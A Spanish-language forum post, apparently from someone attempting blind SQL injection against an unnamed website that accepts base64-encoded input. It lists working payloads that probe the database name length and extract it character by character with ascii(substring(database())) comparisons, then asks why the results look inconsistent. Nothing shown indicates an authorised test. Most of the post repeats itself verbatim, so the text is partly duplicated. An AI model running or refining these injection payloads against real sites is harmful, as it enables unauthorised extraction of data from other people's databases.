hola a todos, les contaré como esta la cosa, estoy con una un problema ya días con una consultas que le hago a las bd, comencé con el simple select 1,2,3 etc
hasta llegar a 10 dejo de mostrar el error, pero no arrojo ningún numero,
me dijeron que probara con blind sqli , y proseguí a sacar la longitud de la base de datos:
con el Length(database()) < 32, fui disminuyendo el 32 hasta llegar al numero 5
SUB5394' AND Length((database())) =5 -- a
y salio que era verdadero
entonces prosegui a sacar caracter por caracter para saber el nombre de la base de datos
SUB5394' AND ascii(substring((database()),1,1)) =97 -- a sale true
SUB5394' AND ascii(substring((database()),1,1)) = 98 -- a sale true
SUB5394' AND ascii(substring((database()),1,1)) = 99 -- a sale true
SUB5394' and ascii(substring((database()),1,1))=109 -- a llegué hasta aqui y salio error
un dato interesante es que todas las consultas las paso a base64 porque la pagina solo trabaja en base64.
mi pregunta es : estoy haciendo algo malo?? ya q me dice que la primera letra pueden ser todas las letras distintas a m.
hay otra forma de hacer blind sql??
hasta llegar a 10 dejo de mostrar el error, pero no arrojo ningún numero,
me dijeron que probara con blind sqli , y proseguí a sacar la longitud de la base de datos:
con el Length(database()) < 32, fui disminuyendo el 32 hasta llegar al numero 5
SUB5394' AND Length((database())) =5 -- a
y salio que era verdadero
entonces prosegui a sacar caracter por caracter para saber el nombre de la base de datos
SUB5394' AND ascii(substring((database()),1,1)) =97 -- a sale true
SUB5394' AND ascii(substring((database()),1,1)) = 98 -- a sale true
SUB5394' AND ascii(substring((database()),1,1)) = 99 -- a sale true
SUB5394' and ascii(substring((database()),1,1))=109 -- a llegué hasta aqui y salio error
un dato interesante es que todas las consultas las paso a base64 porque la pagina solo trabaja en base64.
mi pregunta es : estoy haciendo algo malo?? ya q me dice que la primera letra pueden ser todas las letras distintas a m.
hay otra forma de hacer blind sql??